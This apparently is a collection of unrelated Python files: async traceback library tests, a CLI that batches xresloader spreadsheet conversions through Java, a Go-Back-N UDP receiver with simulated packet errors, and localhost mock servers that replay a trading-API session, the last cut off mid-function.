arrived_evt = threading.Event()
depart_evt = threading.Event()
thread = threading.Thread(target=thread_caller, args=(arrived_evt, depart_evt))
thread.start()
try:
arrived_evt.wait()
if cooked:
tb = Traceback.of(thread)
else:
top_frame = sys._current_frames()[thread.ident]
while (
top_frame.f_back is not None
and top_frame.f_code.co_name != "thread_caller"
):
top_frame = top_frame.f_back
tb = Traceback.since(top_frame)
# Exactly where we are inside Event.wait() is indeterminate, so
# strip frames until we find Event.wait() and then remove it
while (
not tb.frames[-1].filename.endswith("threading.py")
or tb.frames[-1].funcname != "wait"
): # pragma: no cover
tb = attr.evolve(tb, frames=tb.frames[:-1])
while tb.frames[-1].filename.endswith("threading.py"): # pragma: no cover
tb = attr.evolve(tb, frames=tb.frames[:-1])
assert_tb_matches(
tb,
[
("thread_caller", "thread_example(*args)", None, None),
*frames_from_outer_context("thread_example"),
("thread_example", "depart_evt.wait()", None, None),
],
)
finally:
depart_evt.set()
def test_traceback_of_not_alive_thread(isolated_registry):
thread = threading.Thread(target=lambda: None)
assert_tb_matches(Traceback.of(thread), [])
thread.start()
thread.join()
assert_tb_matches(Traceback.of(thread), [])
@customize(get_target=lambda *_: thread)
async def example():
await async_yield(42)
coro = example()
coro.send(None)
assert_tb_matches(
Traceback.of(coro),
[
("example", "await async_yield(42)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
def test_trace_into_thread(local_registry):
trio = pytest.importorskip("trio")
import outcome
# Extremely simplified version of trio.to_thread.run_sync
async def run_sync_in_thread(sync_fn):
task = trio.lowlevel.current_task()
trio_token = trio.lowlevel.current_trio_token()
def run_it():
result = outcome.capture(sync_fn)
trio_token.run_sync_soon(trio.lowlevel.reschedule, task, result)
thread = threading.Thread(target=run_it)
thread.start()
return await trio.lowlevel.wait_task_rescheduled(no_abort)
@register_get_target(run_sync_in_thread)
def get_target(this_frame, next_frame):
return this_frame.f_locals["thread"]
customize(run_sync_in_thread, "run_it", skip_frame=True)
tb = None
async def main():
arrived_evt = trio.Event()
depart_evt = threading.Event()
trio_token = trio.lowlevel.current_trio_token()
task = trio.lowlevel.current_task()
def sync_fn():
with inner_context() as inner: # noqa: F841
trio_token.run_sync_soon(arrived_evt.set)
depart_evt.wait()
def sync_wrapper():
sync_fn()
async def capture_tb():
nonlocal tb
try:
await arrived_evt.wait()
tb = Traceback.of(task.coro)
finally:
depart_evt.set()
async with trio.open_nursery() as nursery:
nursery.start_soon(capture_tb)
await run_sync_in_thread(sync_wrapper)
trio.run(main)
# It's indeterminate where in sync_fn() the traceback was taken -- it could
# be inside run_sync_soon() or inside threading.Event.wait() -- so trim
# traceback frames until we get something reliable.
while tb.frames[-1].filename != __file__:
tb = attr.evolve(tb, frames=tb.frames[:-1])
tb = attr.evolve(
tb,
frames=tb.frames[:-1]
+ (attr.evolve(tb.frames[-1], override_line="<indeterminate>"),),
)
assert_tb_matches(
tb,
[
(
"main",
"async with trio.open_nursery() as nursery:",
"nursery",
"Nursery",
),
("main", "await run_sync_in_thread(sync_wrapper)", None, None),
(
"run_sync_in_thread",
"return await trio.lowlevel.wait_task_rescheduled(no_abort)",
None,
None,
),
("sync_wrapper", "sync_fn()", None, None),
*frames_from_inner_context("sync_fn"),
("sync_fn", "<indeterminate>", None, None),
],
)
@pytest.mark.skipif(
sys.implementation.name == "pypy",
reason="profile function doesn't get called on Travis",
)
def test_threaded_race():
# This tests the case where we're getting the traceback of a coroutine
# running in a foreign thread, but it becomes suspended before we can
# extract the foreign thread's stack.
afn_running = threading.Event()
suspend_afn = threading.Event()
afn_suspended = threading.Event()
resume_afn = threading.Event()
async def async_fn():
with outer_context():
afn_running.set()
suspend_afn.wait()
await async_yield(1)
coro = async_fn()
def runner():
coro.send(None)
afn_suspended.set()
resume_afn.wait()
with pytest.raises(StopIteration):
coro.send(None)
def suspend_at_proper_place(frame, event, arg): # pragma: no cover
# (profile functions don't get traced)
if (
event == "call"
and frame.f_globals is Traceback.of.__func__.__globals__
and frame.f_code.co_name == "try_from"
):
suspend_afn.set()
afn_suspended.wait()
old_profile = sys.getprofile()
sys.setprofile(suspend_at_proper_place)
try:
thread = threading.Thread(target=runner)
thread.start()
assert_tb_matches(
Traceback.of(coro),
[
*frames_from_outer_context("async_fn"),
("async_fn", "await async_yield(1)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
finally:
sys.setprofile(old_profile)
resume_afn.set()
def test_unknown_awaitable():
class WeirdObject:
def __await__(self):
return iter([42])
async def example():
await WeirdObject()
coro = example()
assert 42 == coro.send(None)
name = "sequence" if sys.implementation.name == "pypy" else "list_"
assert_tb_matches(
Traceback.of(coro),
[("example", "await WeirdObject()", None, None)],
error=RuntimeError(
f"Couldn't determine the frame associated with builtins.{name}iterator "
f"<{name}iterator object at (address)>",
),
)
assert_tb_matches(
Traceback.of(42),
[],
error=RuntimeError(
"Couldn't determine the frame associated with builtins.int 42"
),
)
def test_cant_get_referents(monkeypatch):
async def agen():
await async_yield(1)
yield
async def afn():
await async_yield(1)
class SomeAwaitable:
def __await__(self):
return wrapper
ags = agen().asend(None)
wrapper = afn().__await__()
real_get_referents = gc.get_referents
def patched_get_referents(obj):
if obj is ags or obj is wrapper:
return []
return real_get_referents(obj)
monkeypatch.setattr(gc, "get_referents", patched_get_referents)
async def await_it(thing):
await thing
for thing, problem, attrib in (
(ags, ags, "an ag_frame"),
(SomeAwaitable(), wrapper, "a cr_frame"),
):
coro = await_it(thing)
assert 1 == coro.send(None)
assert_tb_matches(
Traceback.of(coro),
[("await_it", "await thing", None, None)],
error=RuntimeError(
f"{problem!r} doesn't refer to anything with {attrib} attribute"
),
)
with pytest.raises(StopIteration):
coro.send(None)
def test_cant_find_running_frame():
greenlet = pytest.importorskip("greenlet")
async def caller():
await example()
async def example():
with outer_context():
greenlet.getcurrent().parent.switch(42)
coro = caller()
gr = greenlet.greenlet(coro.send)
assert gr.switch(None) == 42
assert_tb_matches(
Traceback.of(coro),
[("caller", "await example()", None, None)],
error=RuntimeError(
"Couldn't find where the above frame is running, so can't continue "
"traceback"
),
)
with pytest.raises(StopIteration):
gr.switch(None)
def test_with_trickery_disabled(monkeypatch):
import asynctb
monkeypatch.setattr(asynctb._frames, "_can_use_trickery", False)
def sync_example(root):
with outer_context():
return Traceback.since(root)
# CPython GC doesn't crawl currently executing frames, so we get more
# data without trickery on PyPy than on CPython
only_on_pypy = [
("sync_example", "", None, "_GeneratorContextManager"),
("outer_context", "", None, "_GeneratorContextManager"),
("inner_context", "", None, "ExitStack"),
(
"inner_context",
"# _.enter_context(asynctb._tests.test_traceback.null_context())",
"_[0]",
"_GeneratorContextManager",
),
("null_context", "yield", None, None),
(
"inner_context",
"# _.push(asynctb._tests.test_traceback.exit_cb)",
"_[1]",
None,
),
(
"inner_context",
"# _.callback(asynctb._tests.test_traceback.other_cb, 10, 'hi', answer=42)",
"_[2]",
None,
),
("inner_context", "yield", None, None),
("outer_context", "yield", None, None),
]
assert_tb_matches(
sync_example(sys._getframe(0)),
[
(
"test_with_trickery_disabled",
"sync_example(sys._getframe(0)),",
None,
None,
),
*(only_on_pypy if sys.implementation.name == "pypy" else []),
("sync_example", "return Traceback.since(root)", None, None),
],
)
async def async_example():
with outer_context():
return await async_yield(42)
coro = async_example()
assert 42 == coro.send(None)
assert_tb_matches(
Traceback.of(coro),
[
("async_example", "", None, "_GeneratorContextManager"),
("outer_context", "", None, "_GeneratorContextManager"),
("inner_context", "", None, "ExitStack"),
(
"inner_context",
f"# _.enter_context({null_context_repr})",
"_[0]",
"_GeneratorContextManager",
),
("null_context", "yield", None, None),
(
"inner_context",
"# _.push(asynctb._tests.test_traceback.exit_cb)",
"_[1]",
None,
),
(
"inner_context",
"# _.callback(asynctb._tests.test_traceback.other_cb, 10, 'hi', answer=42)",
"_[2]",
None,
),
("inner_context", "yield", None, None),
("outer_context", "yield", None, None),
("async_example", "return await async_yield(42)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
def test_trio_nursery():
trio = pytest.importorskip("trio")
async_generator = pytest.importorskip("async_generator")
@async_generator.asynccontextmanager
@async_generator.async_generator
async def uses_nursery():
async with trio.open_nursery() as inner: # noqa: F841
await async_generator.yield_()
async def main():
result: Traceback
task = trio.lowlevel.current_task()
def report_back():
nonlocal result
result = Traceback.of(task.coro)
trio.lowlevel.reschedule(task)
async with trio.open_nursery() as outer, uses_nursery(): # noqa: F841
trio.lowlevel.current_trio_token().run_sync_soon(report_back)
await trio.lowlevel.wait_task_rescheduled(no_abort)
return result
assert_tb_matches(
trio.run(main),
[
(
"main",
"async with trio.open_nursery() as outer, uses_nursery():",
"outer",
"Nursery",
),
(
"main",
"async with trio.open_nursery() as outer, uses_nursery():",
None,
"_AsyncGeneratorContextManager",
),
(
"uses_nursery",
"async with trio.open_nursery() as inner:",
"inner",
"Nursery",
),
("uses_nursery", "await async_generator.yield_()", None, None),
("main", "await trio.lowlevel.wait_task_rescheduled(no_abort)", None, None),
],
)
def test_greenback():
trio = pytest.importorskip("trio")
greenback = pytest.importorskip("greenback")
results: List[Traceback] = []
async def outer():
async with trio.open_nursery() as outer_nursery: # noqa: F841
middle()
await inner()
def middle():
nursery_mgr = trio.open_nursery()
with greenback.async_context(nursery_mgr) as middle_nursery: # noqa: F841
greenback.await_(inner())
# This winds up traversing an await_ before it has a coroutine to use.
class ExtractWhenAwaited:
def __await__(self):
task = trio.lowlevel.current_task()
assert_tb_matches(
Traceback.of(task.coro),
[
(
"greenback_shim",
"return await _greenback_shim(orig_coro)",
None,
None,
),
("main", "return await outer()", None, None),
(
"outer",
"async with trio.open_nursery() as outer_nursery:",
"outer_nursery",
"Nursery",
),
("outer", "middle()", None, None),
(
"middle",
"with greenback.async_context(nursery_mgr) as middle_nursery:",
"middle_nursery",
"Nursery",
),
(
"middle",
"greenback.await_(ExtractWhenAwaited())",
None,
None,
),
("adapt_awaitable", "return await aw", None, None),
("__await__", "Traceback.of(task.coro),", None, None),
],
)
yield from ()
greenback.await_(ExtractWhenAwaited()) # pragma: no cover
async def inner():
with null_context():
task = trio.lowlevel.current_task()
def report_back():
results.append(Traceback.of(task.coro))
trio.lowlevel.reschedule(task)
trio.lowlevel.current_trio_token().run_sync_soon(report_back)
await trio.lowlevel.wait_task_rescheduled(no_abort)
async def main():
await greenback.ensure_portal()
return await outer()
trio.run(main)
assert len(results) == 2
assert_tb_matches(
results[0],
[
("greenback_shim", "return await _greenback_shim(orig_coro)", None, None,),
("main", "return await outer()", None, None),
(
"outer",
"async with trio.open_nursery() as outer_nursery:",
"outer_nursery",
"Nursery",
),
("outer", "middle()", None, None),
(
"middle",
"with greenback.async_context(nursery_mgr) as middle_nursery:",
"middle_nursery",
"Nursery",
),
("middle", "greenback.await_(inner())", None, None),
("inner", "with null_context():", None, "_GeneratorContextManager"),
("null_context", "yield", None, None),
(
"inner",
"await trio.lowlevel.wait_task_rescheduled(no_abort)",
None,
None,
),
],
)
assert_tb_matches(
results[1],
[
("greenback_shim", "return await _greenback_shim(orig_coro)", None, None,),
("main", "return await outer()", None, None),
(
"outer",
"async with trio.open_nursery() as outer_nursery:",
"outer_nursery",
"Nursery",
),
("outer", "await inner()", None, None),
("inner", "with null_context():", None, "_GeneratorContextManager"),
("null_context", "yield", None, None),
(
"inner",
"await trio.lowlevel.wait_task_rescheduled(no_abort)",
None,
None,
),
],
)
def test_exitstack_formatting():
class A:
def __repr__(self):
return "A()"
def method(self, *args):
pass
with ExitStack() as stack:
stack.callback(A().method)
stack.push(A().method)
stack.callback(partial(lambda x: None, 42))
tb = Traceback.since(sys._getframe(0))
assert_tb_matches(
tb,
[
(
"test_exitstack_formatting",
"with ExitStack() as stack:",
"stack",
"ExitStack",
),
(
"test_exitstack_formatting",
"# stack.callback(A().method)",
"stack[0]",
None,
),
(
"test_exitstack_formatting",
"# stack.push(A().method)",
"stack[1]",
"A",
),
(
"test_exitstack_formatting",
"# stack.callback(functools.partial(<function test_exitstack_formatting.<locals>.<lambda> at (address)>, 42))",
"stack[2]",
None,
),
(
"test_exitstack_formatting",
"tb = Traceback.since(sys._getframe(0))",
None,
None,
),
],
)
ACM_IMPLS: List[Callable[..., Any]] = []
try:
ACM_IMPLS.append(cast(Any, contextlib).asynccontextmanager)
except AttributeError:
pass
try:
import async_generator
except ImportError:
pass
else:
ACM_IMPLS.append(async_generator.asynccontextmanager)
@pytest.mark.parametrize("asynccontextmanager", ACM_IMPLS)
def test_asyncexitstack_formatting(asynccontextmanager):
try:
from contextlib import AsyncExitStack
except ImportError:
try:
from async_exit_stack import AsyncExitStack # type: ignore
except ImportError: # pragma: no cover
pytest.skip("no AsyncExitStack")
class A:
def __repr__(self):
return "<A>"
async def __aenter__(self):
pass
async def __aexit__(self, *exc):
pass
async def aexit(self, *exc):
pass
async def aexit2(*exc):
pass
async def acallback(*args):
pass
@asynccontextmanager
async def amgr():
yield
async def async_fn():
async with AsyncExitStack() as stack:
await stack.enter_async_context(A())
await stack.enter_async_context(amgr())
stack.push_async_exit(A().aexit)
stack.push_async_exit(aexit2)
stack.push_async_callback(acallback, "hi")
await async_yield(None)
if asynccontextmanager.__module__.startswith("async_generator"):
expect_name = "amgr(...)"
else:
expect_name = (
"asynctb._tests.test_traceback.test_asyncexitstack_formatting."
"<locals>.amgr()"
)
coro = async_fn()
assert coro.send(None) is None
assert_tb_matches(
Traceback.of(coro),
[
(
"async_fn",
"async with AsyncExitStack() as stack:",
"stack",
"AsyncExitStack",
),
("async_fn", "# await stack.enter_async_context(<A>)", "stack[0]", "A"),
(
"async_fn",
f"# await stack.enter_async_context({expect_name})",
"stack[1]",
"_AsyncGeneratorContextManager",
),
("amgr", "yield", None, None),
("async_fn", "# stack.push_async_exit(<A>.aexit)", "stack[2]", "A"),
(
"async_fn",
"# stack.push_async_exit(asynctb._tests.test_traceback.test_asyncexitstack_formatting.<locals>.aexit2)",
"stack[3]",
None,
),
(
"async_fn",
"# stack.push_async_callback(asynctb._tests.test_traceback.test_asyncexitstack_formatting.<locals>.acallback, 'hi')",
"stack[4]",
None,
),
("async_fn", "await async_yield(None)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
|
xresconv-cli.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import glob
import io
import locale
import os
import platform
import re
import shutil
import string
import sys
import tempfile
# ==================================================================================
import threading
import xml.etree.ElementTree as ET
from multiprocessing import cpu_count
from optparse import OptionParser
from subprocess import PIPE, STDOUT, Popen
from print_color import cprintf_stderr, cprintf_stdout, print_style
console_encoding = sys.getfilesystemencoding()
if 'utf-8' != sys.getdefaultencoding().lower():
try:
sys.setdefaultencoding('utf-8')
except Exception:
reload(sys)
sys.setdefaultencoding('utf-8')
xconv_options = {
'version': '1.1.0.1',
'conv_list': None,
'real_run': True,
'args': {},
'ext_args_l1': [],
'ext_args_l2': [],
'work_dir': '.',
'xresloader_path': 'xresloader.jar',
'item': [],
'parallelism': int((cpu_count() - 1) / 2) + 1,
'java_options': [],
'default_scheme': {}
}
# Default to two worker threads; in testing, the JVM's own runtime optimizations improved throughput more than extra threads did
if xconv_options['parallelism'] > 2:
xconv_options['parallelism'] = 2
xconv_xml_global_nodes = []
xconv_xml_list_item_nodes = []
usage = "usage: %prog [options...] <convert list file> [xresloader options...]"
parser = OptionParser(usage)
parser.disable_interspersed_args()
parser.add_option(
"-v",
"--version",
action="store_true",
help="show version and exit",
dest="version",
default=False)
parser.add_option(
"-s",
"--scheme-name",
action="append",
help="only convert schemes with name <scheme name>",
metavar="<scheme>",
dest="rule_schemes",
default=[])
parser.add_option(
"-t",
"--test",
action="store_true",
help="test run and show cmds",
dest="test",
default=False)
parser.add_option(
"-p",
"--parallelism",
action="store",
help="set parallelism task number(default:" +
str(xconv_options['parallelism']) + ')',
metavar="<number>",
dest="parallelism",
type="int",
default=xconv_options['parallelism'])
parser.add_option(
"-j",
"--java-option",
action="append",
help="add java options to command(example: Xmx=2048m)",
metavar="<java option>",
dest="java_options",
default=[])
(options, left_args) = parser.parse_args()
if options.version:
print(xconv_options['version'])
exit(0)
def print_help_msg(err_code):
parser.print_help()
exit(err_code)
if 0 == len(left_args):
print_help_msg(-1)
xconv_options['conv_list'] = left_args.pop(0)
xconv_options['ext_args_l2'] = left_args
# ========================================= Global configuration parsing =========================================
''' Read an XML configuration file '''
def load_xml_file(file_path):
try:
xml_doc = ET.parse(file_path)
except Exception as e:
print(e)
exit(-2)
root_node = xml_doc.getroot()
if root_node is None:
print('[ERROR] root node not found in xml')
print_help_msg(-3)
# Enumerate <include> files
include_nodes = root_node.findall("./include")
if include_nodes and len(include_nodes) > 0:
dir_prefix = os.path.dirname(file_path)
for include_node in include_nodes:
include_file_path = include_node.text
if include_file_path and len(include_file_path) > 1:
if include_file_path[0] != '/' and include_file_path[1] != ':':
include_file_path = os.path.join(dir_prefix,
include_file_path)
load_xml_file(include_file_path)
global_nodes = root_node.findall("./global")
if global_nodes and len(global_nodes) > 0:
xconv_xml_global_nodes.extend(global_nodes)
list_item_nodes = root_node.findall("./list/item")
if list_item_nodes and len(list_item_nodes) > 0:
xconv_xml_list_item_nodes.extend(list_item_nodes)
load_xml_file(xconv_options['conv_list'])
# Parse/merge <global> configuration
def load_global_options(gns):
for global_node in gns:
for global_option in global_node:
tag_name = global_option.tag.lower()
text_value = global_option.text
if text_value:
trip_value = text_value.strip()
else:
trip_value = None
if not trip_value:
continue
if tag_name == 'work_dir':
xconv_options['work_dir'] = text_value
elif tag_name == 'xresloader_path':
xconv_options['xresloader_path'] = text_value
elif tag_name == 'proto':
xconv_options['args']['-p'] = trip_value
elif tag_name == 'output_type':
xconv_options['args']['-t'] = trip_value
elif tag_name == 'proto_file':
xconv_options['args']['-f'] = '"' + text_value + '"'
elif tag_name == 'output_dir':
xconv_options['args']['-o'] = '"' + text_value + '"'
elif tag_name == 'data_src_dir':
xconv_options['args']['-d'] = '"' + text_value + '"'
elif tag_name == 'rename':
xconv_options['args']['-n'] = '"' + trip_value + '"'
elif tag_name == 'option':
xconv_options['ext_args_l1'].append(trip_value)
elif tag_name == 'java_option':
xconv_options['java_options'].append(trip_value)
elif tag_name == 'default_scheme':
if 'name' in global_option.attrib:
scheme_key = global_option.attrib['name']
if scheme_key in xconv_options['default_scheme']:
xconv_options['default_scheme'][scheme_key].append(
trip_value)
else:
xconv_options['default_scheme'][
scheme_key] = [text_value]
else:
print('[ERROR] unknown global configure ' + tag_name)
if xconv_xml_global_nodes and len(xconv_xml_global_nodes) > 0:
load_global_options(xconv_xml_global_nodes)
# ----------------------------------------- Global configuration parsing -----------------------------------------
conv_list_dir = os.path.dirname(xconv_options['conv_list'])
if conv_list_dir:
os.chdir(conv_list_dir)
os.chdir(xconv_options['work_dir'])
cprintf_stdout([print_style.FC_YELLOW],
'[NOTICE] start to run conv cmds on dir: {0}' + os.linesep,
os.getcwd())
if not os.path.exists(xconv_options['xresloader_path']):
print(os.getcwd())
cprintf_stderr([print_style.FC_RED],
'[ERROR] xresloader not found.({0})' + os.linesep,
xconv_options['xresloader_path'])
exit(-4)
# ========================================= Conversion list parsing =========================================
# Parse/merge per-item conversion configuration
def load_list_item_nodes(lis):
for item in lis:
conv_item_obj = {
'file': False,
'scheme': False,
'options': [],
'enable': False,
'scheme_data': {}
}
if 'file' in item.attrib:
conv_item_obj['file'] = item.attrib['file']
if 'scheme' in item.attrib:
conv_item_obj['scheme'] = item.attrib['scheme']
# Per-item options
for local_option in item.findall('./option'):
text_value = local_option.text
if text_value:
trip_value = text_value.strip()
else:
trip_value = None
if not trip_value:
continue
conv_item_obj['options'].append(trip_value)
# Per-item scheme data
for local_option in item.findall('./scheme'):
text_value = local_option.text
if text_value:
trip_value = text_value.strip()
else:
trip_value = None
if not trip_value:
continue
if 'name' in local_option.attrib:
scheme_key = local_option.attrib['name']
if scheme_key and scheme_key in conv_item_obj['scheme_data']:
conv_item_obj['scheme_data'][scheme_key].append(text_value)
else:
conv_item_obj['scheme_data'][scheme_key] = [text_value]
for key in xconv_options['default_scheme']:
if key not in conv_item_obj['scheme_data']:
conv_item_obj['scheme_data'][key] = xconv_options[
'default_scheme'][key]
# Conversion rule filter: enable only items whose scheme matches
if not options.rule_schemes or 0 == len(
options.rule_schemes) or conv_item_obj[
'scheme'] in options.rule_schemes:
conv_item_obj['enable'] = True
xconv_options['item'].append(conv_item_obj)
if xconv_xml_list_item_nodes and len(xconv_xml_list_item_nodes) > 0:
load_list_item_nodes(xconv_xml_list_item_nodes)
# ----------------------------------------- Conversion list parsing -----------------------------------------
# ========================================= Generate conversion commands =========================================
##### Global command prefix and options
global_cmd_prefix = ''
for global_optk in xconv_options['args']:
global_optv = xconv_options['args'][global_optk]
global_cmd_prefix += ' ' + global_optk + ' ' + global_optv
if len(xconv_options['ext_args_l1']) > 0:
global_cmd_prefix += ' ' + ' '.join(xconv_options['ext_args_l1'])
##### Extra command line arguments
global_cmd_suffix = ''
if len(xconv_options['ext_args_l2']) > 0:
global_cmd_suffix += ' ' + ' '.join(xconv_options['ext_args_l2'])
cmd_list = []
for conv_item in xconv_options['item']:
if not conv_item['enable']:
continue
item_cmd_options = ''
if len(conv_item['options']) > 0:
item_cmd_options += ' ' + ' '.join(conv_item['options'])
if conv_item['file'] and conv_item['scheme']:
cmd_scheme_info = ' -s "{:s}" -m "{:s}"'.format(conv_item['file'],
conv_item['scheme'])
else:
cmd_scheme_info = ''
for key in conv_item['scheme_data']:
for opt_val in conv_item['scheme_data'][key]:
cmd_scheme_info += ' -m "{:s}={:s}"'.format(key, opt_val)
run_cmd = global_cmd_prefix + item_cmd_options + cmd_scheme_info + global_cmd_suffix
cmd_list.append(run_cmd)
cmd_list.reverse()
# ----------------------------------------- Generate conversion commands -----------------------------------------
exit_code = 0
all_worker_thread = []
cmd_picker_lock = threading.Lock()
def worker_func(idx):
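# Each worker drives one java xresloader process: commands are popped from the
# shared cmd_list under a lock and fed to the process via stdin; in test mode
# the commands are only printed instead of executed.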
global exit_code
java_options = ""
if len(options.java_options) > 0:
java_options += ' "-{0}"'.format('" "-'.join(options.java_options))
if len(xconv_options['java_options']) > 0:
java_options += ' "{0}"'.format('" "'.join(xconv_options[
'java_options']))
pexec = None
if not options.test:
pexec = Popen(
'java {0} -jar "{1}" --stdin'.format(
java_options, xconv_options['xresloader_path']),
stdin=PIPE,
stdout=None,
stderr=None,
shell=True)
while True:
cmd_picker_lock.acquire()
if len(cmd_list) <= 0:
cmd_picker_lock.release()
break
pexec.stdin.write(cmd_list.pop().encode(console_encoding))
cmd_picker_lock.release()
pexec.stdin.write(os.linesep.encode(console_encoding))
pexec.stdin.flush()
pexec.stdin.close()
cmd_exit_code = pexec.wait()
exit_code = exit_code + cmd_exit_code
else:
this_thd_cmds = []
while True:
cmd_picker_lock.acquire()
if len(cmd_list) <= 0:
cmd_picker_lock.release()
break
# Python 2 must encode the string to bytes here, otherwise the output is garbled
# Python 3 must not call encode(), because that would turn the string into bytes
if sys.version_info.major < 3:
this_thd_cmds.append(cmd_list.pop().encode(console_encoding))
else:
this_thd_cmds.append(cmd_list.pop())
cmd_picker_lock.release()
cprintf_stdout([print_style.FC_GREEN], (
'java {0} -jar "{1}" --stdin' + os.linesep + '\t>{2}' + os.linesep
).format(java_options, xconv_options['xresloader_path'],
(os.linesep + '\t>').join(this_thd_cmds)))
for i in range(0, options.parallelism):
this_worker_thd = threading.Thread(target=worker_func, args=[i])
this_worker_thd.start()
all_worker_thread.append(this_worker_thd)
# Wait for all worker threads to finish
for thd in all_worker_thread:
thd.join()
# ----------------------------------------- Run the conversions -----------------------------------------
cprintf_stdout([print_style.FC_MAGENTA],
'[INFO] all jobs done. {0} job(s) failed.{1}'.format(
exit_code, os.linesep))
exit(exit_code)
|
receptor.py
|
import threading
import time
from socket import *
import checksum_udp
# Socket
serverPort = 12000
serverSocket = socket(AF_INET, SOCK_DGRAM)
serverSocket.bind(('', serverPort))
# Go-back-N
delim = '_'
expectedseqnum = 0
corrupted_packet = False
lost_packet = False
delayed_packet = False
errors = True
def spawn():
return threading.Thread(target=receiver_callback)
def receiver_callback():
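# Go-Back-N receiver step: spawn the next listener thread, then validate the
# packet's sequence number and checksum; ACK the expected packet or re-ACK the
# last in-order one, optionally simulating delay/loss/corruption.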
global expectedseqnum
global corrupted_packet
global delayed_packet
global lost_packet
data, client_address = serverSocket.recvfrom(2048)
t = spawn()
t.start()
seqnum, message, cs = data.split(delim)
checksum_msg = seqnum + delim + message
seqnum = int(seqnum)
# Error simulations
if errors:
if seqnum == 2 and not delayed_packet: # ACK delayed forcing timeout
delayed_packet = True
time.sleep(10)
if seqnum == 5 and not lost_packet: # Packet intentionally lost
lost_packet = True
return
if seqnum == 6 and not corrupted_packet: # Packet corrupted (checksum is shifted to the left by 1 bit)
corrupted_packet = True
cs = (int(cs) << 1).__str__()
print """\nData received! @ %s
Expected sequence number: %d
Data info:
- Sequence Number: [%d]
- Message: %s
- Checksum: %s""" % (time.asctime(), expectedseqnum, seqnum, message, cs)
if expectedseqnum == seqnum and \
checksum_udp.checksum(str.encode(checksum_msg)).__str__() == cs:
new_message = expectedseqnum.__str__() + delim + 'ACK'
print '%s: Response sent: %s to %s\n' % (time.asctime(), new_message, client_address)
serverSocket.sendto(new_message, client_address)
expectedseqnum = expectedseqnum + 1
else:
print '!----------------------------------------------!'
print '!ERROR: Corrupted or unordered packet received.!'
print '!----------------------------------------------!'
lastseqnum = 0 if expectedseqnum == 0 else expectedseqnum - 1
default_message = lastseqnum.__str__() + delim + 'ACK'
print '%s: Response sent: %s to %s\n' % (time.asctime(), default_message, client_address)
serverSocket.sendto(default_message, client_address)
def main():
global expectedseqnum
global corrupted_packet
global delayed_packet
global lost_packet
global errors
answer = raw_input('Simulate errors? (Y/N): ')
errors = True if answer == 'Y' or answer == 'y' else False
print '+---------------------------------+'
print '|The server is ready to receive. |'
print '|Type \'r\' at any time to restart. |'
print '+---------------------------------+'
t = spawn()
t.start()
while True:
restart = raw_input()
if restart == 'r' or restart == 'R':
expectedseqnum = 0
corrupted_packet = False
delayed_packet = False
lost_packet = False
answer = raw_input('Simulate errors? (Y/N): ')
errors = True if answer == 'Y' or answer == 'y' else False
print '+----------------+'
print '|Server restarted|'
print '+----------------+'
if __name__ == "__main__":
main()
|
helper.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import lzma
import threading
import asyncio
import websockets
from aiohttp import web
class MockInsServer():
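# Minimal instrument-info mock: serves a fixed SHFE.cu1901 JSON payload over
# HTTP from an aiohttp server running on its own event loop in a background thread.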
def __init__(self, port):
self.loop = asyncio.new_event_loop()
self.port = port
self.thread = threading.Thread(target=self._run)
self.thread.start()
self.stop_signal = self.loop.create_future()
def close(self):
self.loop.call_soon_threadsafe(lambda: self.stop_signal.set_result(0))
self.thread.join()
async def handle(self, request):
data = {
"SHFE.cu1901": {
"class": "FUTURE",
"instrument_id": "SHFE.cu1901",
"exchange_id": "SHFE",
"ins_id": "cu1901",
"ins_name": "\u6caa\u94dc1901",
"volume_multiple": 5,
"price_tick": 10,
"price_decs": 0,
"sort_key": 20,
"expired": True,
"py": "ht,hutong,yinjitong",
"product_id": "cu",
"product_short_name": "\u6caa\u94dc",
"delivery_year": 2019,
"delivery_month": 1,
"expire_datetime": 1547535600.0,
"last_price": 46940.0,
"pre_volume": 0,
"open_interest": 0,
"settlement_price": 46880.0,
"max_market_order_volume": 0,
"max_limit_order_volume": 500,
"margin": 16247.0,
"commission": 11.605,
"mmsa": 1,
"trading_time": {
"day": [["09:00:00", "10:15:00"], ["10:30:00", "11:30:00"], ["13:30:00", "15:00:00"]],
"night": [["21:00:00", "25:00:00"]]
}
}
}
return web.json_response(data)
async def task_serve(self):
app = web.Application()
app.add_routes([web.get('/{tail:.*}', self.handle)])
runner = web.AppRunner(app)
await runner.setup()
site = web.TCPSite(runner, '127.0.0.1', self.port)
await site.start()
await self.stop_signal
await runner.cleanup()
def _run(self):
asyncio.set_event_loop(self.loop)
self.loop.run_until_complete(self.task_serve())
class MockServer():
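# Replays a recorded (lzma-compressed) session log as mock md/td websocket
# servers, asserting that the client sends the same packets as in the log.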
def __init__(self):
self.loop = asyncio.new_event_loop()
self.connections = {}
self.server_md = None
self.server_td = None
self.md_port = 5100
self.td_port = 5200
self._expecting = {}
self.stop_signal = self.loop.create_future()
def close(self):
assert not self._expecting
self.loop.call_soon_threadsafe(lambda: self.stop_signal.set_result(0))
self.thread.join()
async def _handler_md(self, connection, path):
await self.on_connected("md", connection)
try:
while True:
s = await self.connections["md"].recv()
pack = json.loads(s)
await self.on_received("md", pack)
except websockets.exceptions.ConnectionClosedOK as e:
assert e.code == 1000
async def _handler_td(self, connection, path):
await self.on_connected("td", connection)
while True:
s = await self.connections["td"].recv()
pack = json.loads(s)
if pack["aid"] == "peek_message":
continue
await self.on_received("td", pack)
def run(self, script_file_name):
self.script_file_name = script_file_name
self.thread = threading.Thread(target=self._run)
self.thread.start()
async def _server(self):
async with websockets.serve(self._handler_md, "127.0.0.1", self.md_port) as self.server_md:
async with websockets.serve(self._handler_td, "127.0.0.1", self.td_port) as self.server_td:
await self.stop_signal
def _run(self):
self.script_file = lzma.open(self.script_file_name, "rt", encoding="utf-8")
asyncio.set_event_loop(self.loop)
self.loop.run_until_complete(self._server())
async def _process_script(self):
# Process the script file one line at a time, until a message the client is expected to send is reached
self._expecting = {}
for line in self.script_file:
# 2019-09-09 16:22:40,652 - DEBUG - websocket message sent to wss://openmd.shinnytech.com/t/md/front/mobile: {"aid": "subscribe_quote",
item = {}
if "websocket message sent" in line and "peek_message" not in line:
item["type"] = "sent"
elif "websocket message received" in line:
item["type"] = "received"
else:
continue
if "openmd" in line:
item["source"] = "md"
elif "opentd" in line:
item["source"] = "td"
else:
raise Exception()
